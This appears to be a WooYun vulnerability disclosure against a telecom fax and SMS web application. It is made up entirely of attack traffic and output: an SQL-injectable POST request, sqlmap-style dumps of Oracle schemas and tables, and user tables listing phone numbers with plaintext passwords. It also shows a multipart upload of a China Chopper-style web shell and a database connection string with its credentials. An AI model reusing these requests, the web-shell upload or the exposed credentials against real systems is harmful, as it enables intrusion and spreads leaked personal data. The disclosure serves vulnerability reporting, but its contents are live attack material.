WooYun.org

POST /emp/jxtEmployeeRst.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/emp/jxtEmployee.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 172
DNT: 1
Host: **.**.**.**
Pragma: no-cache
Cookie: JSESSIONID=6902EAA62E8189BC91E17DA05C7B72B3
name=dfsf&sex=&cardid=&department=&nativeplace=&email=&m_tel=&folk=&h_tel=&title=&edulevel=&birth_date=&o_tel=&instime=&opempno=&butt=&rowId=&optFlag=&hidden2=&hidden3=&id=

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] LTJXT
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

Database: LTJXT
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| URL_TRACE           | 172615  |
| CS_DIALOUT_TEL      | 52453   |
| CS_DIALOUT_DETAIL   | 51752   |
| CS_DIALOUT_TASK     | 47836   |
| CS_DIALOUT_OPERATE  | 47754   |
| S_AFFIX             | 44429   |
| JXT_TICKET          | 42227   |
| JXT_DAYPAY          | 36077   |
| FAX_SEND_D          | 25805   |
| FAX_SEND_M          | 22935   |
| FAX_SMSMSG          | 22588   |
| JXT_TEAMRELA        | 14579   |
| JXT_MONTHFREE       | 13852   |
| TEMP_LOG            | 10938   |
| JXT_WORKLOG         | 6900    |
| FAX_RECEIVE         | 5363    |
| FAX_RECEIVE_HIS     | 3895    |
| JXT_EMPLOYEE        | 3773    |
| JXT_MONTHPAY        | 3769    |
| SMS_REVMSG          | 2750    |
| SMS_SNDMSG_HIS      | 1235    |
| JXT_GROUP_HIS       | 1115    |
| SMS_MODEL           | 846     |
| JXT_CUSTOMER        | 619     |
| BM_TS_MSGCONTENT    | 574     |
| FAX_TELNOCHECK      | 539     |
| JXT_SYSUSER         | 419     |
| JXT_GROUP           | 368     |
| JXT_CALLINGCARD     | 255     |
| JXT_PRV_ROLE        | 245     |
| BM_TS_DOWN          | 214     |
| JXT_SALE_MAN        | 175     |
| JXT_DISTRUST        | 161     |
| BM_LAWS             | 160     |
| BM_ANSWER           | 153     |
| LKF_WEBMAN          | 134     |
| JXT_MENU            | 88      |
| TEST_MENU           | 88      |
| CSQ                 | 65      |
| SMS_SNDMSG_FAULT    | 64      |
| BM_BMTS_CONTENT     | 62      |
| JXT_SYSUSER_HIS     | 59      |
| JXT_TEAM            | 57      |
| JXT_MENU_PAN        | 56      |
| JXT_MENU_TEST       | 56      |
| JXT_MEMO            | 54      |
| FAX_SEND_D_HIS      | 48      |
| JXT_DEPARTMENT      | 45      |
| JXT_SEAL            | 42      |
| BM_TS_MENU          | 32      |
| CS_DIALOUT_TIME     | 30      |
| BM_LINK             | 28      |
| SMS_D_TYPE          | 28      |
| SMS_MODEL_HIS       | 28      |
| JXT_RESGROUPID      | 27      |
| JXT_SUBCOM          | 25      |
| TMP_TICKET          | 12      |
| JXT_ROLE            | 9       |
| JXT_WORKFLOW        | 9       |
| TEST_ROLE           | 8       |
| FAX_CONTRAST_DETAIL | 7       |
| JXT_SMSTRANS        | 7       |
| SMS_M_TYPE          | 7       |
| SMS_MONTHRECKONING  | 7       |
| SMS_SNDMSG          | 7       |
| JXT_FEECODE         | 4       |
| JXT_WORKCHECK       | 4       |
| JXT_WORKFLOW_TYPE   | 4       |
| CS_FAX_SYSTEM       | 1       |
| FAX_AFFIX1          | 1       |
| JXT_GROUPID         | 1       |
| JXT_SRCTEL          | 1       |
| LKF_VERSION         | 1       |
+---------------------+---------+

Database: LTJXT 
Table: JXT_SYSUSER
[2 entries]
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| GROUPID | SUBCOMID | NAME        | MTEL | EMPNO       | STATE | PASSWD | SMSTAB | SYSROLE | OPEMPNO | INSTIME | CRE_EMPNO |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| 10041   | 30       | 13322063918 | NULL | 13322063918 | 0     | 444999 | NULL   | 01      | SMS     |         | SMS       |
| 10042   | 30       | 13307575890 | NULL | 13307575890 | 0     | 202020 | NULL   | 50      | SMS     |         | SMS       |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+

able: LKF_WEBMAN
[4 entries]
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| SUBCOMID | SYSUSERID | SUPUSERID | FAX  | NAME | ROLE | O_TEL       | STATE | EMAIL | PASSWD     | MOBTEL      | INSTIME |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| 01       | sys       | NULL      | NULL |      | 0    | NULL        | 0     | NULL  | hnabc      | 13322004434 |         |
| 13       | qh01      | jt01      | NULL |      | 1    | NULL        | 0     | NULL  | 123456     | 13322002698 |         |
| 01       | ltsys     | NULL      | NULL |      | 0    | NULL        | 0     | NULL  | UNICOM2005 | NULL        |         |
| 01       | cs        | NULL      | NULL |      | 0    | 13322002325 | 0     | NULL  | 123456     | 13322002325 |         |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+

POST /fax/FaxSend/Upload_Fax_Affix.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/fax/FaxSend/index.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7df15b3b60cde
Accept-Encoding: gzip, deflate
Content-Length: 7992
DNT: 1
Host: **.**.**.**
……
Content-Disposition: form-data; name="upload"; filename="D:\sectools\web\caidao-20141213\Customize\fckedit.jsp"
Content-Type: text/plain

conn = DriverManager.getConnection("jdbc:oracle:thin:@localhost:1521:oradata", "ltjxt", "ltjxt");